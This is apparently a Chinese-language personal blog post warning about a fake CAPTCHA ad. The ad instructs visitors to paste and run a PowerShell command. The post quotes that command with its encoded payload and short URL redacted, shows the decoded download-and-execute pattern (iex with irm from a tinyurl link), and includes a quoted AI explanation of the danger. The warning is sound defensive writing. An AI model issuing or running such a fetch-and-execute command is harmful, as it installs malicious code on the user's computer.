最近瀏覽某些網站

有時候想要下載音樂或影片會跑一些奇奇怪怪的廣告出來

基本上99%都是詐騙廣告

但當然有一些是正經打廣告的

不過大部分都是詐騙

要小心網址仿冒就是

因為你遇到這些廣告通常都是想下載什麼...

所以遇到 “驗證程序” 或是要你 “允許” 或是 “直接吐檔案” 給你的

都要很小心

 

 

 

今天偶然看到一個廣告

標題寫: 我不是機器人 i am not a robot

然後圖片說要三步驟驗證

要你按 win + R

然後 ctrl + V 貼上

然後執行

 

這...

很明顯是駭客動作

但是會不會真有人傻傻照做呢?

我猜還是會有

但可能是針對外國人吧 

 

內容貼上是這樣

 

powershell -enc XXXXXXXXXXXXXXX(為了避免有人真照做,我就不放代碼了) -w h

 

用 base64 encode 的

解出來是

 

h;iex(irm https://tinyurl.com/XXXXXXX )

 

 

給 GPT解釋是這樣

 

解釋這段 PowerShell 指令:

 

h;iex(irm https://tinyurl.com/XXXXX)

 

 

h; 這段看起來是沒意義的多餘字元,可能是混淆技術(obfuscation)。

 

iex 是 Invoke-Expression 的縮寫,可以執行字串形式的 PowerShell 指令。

 

irm 是 Invoke-RestMethod 的縮寫,用來從網址取得內容。

 

https://tinyurl.com/XXXXX 是一個縮網址,會導向到一段實際的 PowerShell 腳本。

 

這是什麼?

這是一段 下載並執行遠端腳本的 PowerShell 命令。

而且用了 Base64 編碼來 隱藏內容,這常見於: 

惡意軟體(malware) 

網路釣魚(phishing) 

想繞過防毒軟體或系統監控的腳本

 

是否危險?

是的,這可能非常危險。

除非你完全信任這段腳本背後的來源,否則千萬不要執行它,因為它會從網路下載 PowerShell 程式碼並立刻執行,有可能植入木馬、竊取資料或控制電腦。

 

 

 

有點類似於你自己執行script 安裝木馬的意思

不過我連過去是404

蠻奇怪的

 

遇到這種網址

可以使用網站像是 CheckShortURL 來查看縮網址的原始連結,確保安全

https://checkshorturl.com/

 

 

 

給大家參考囉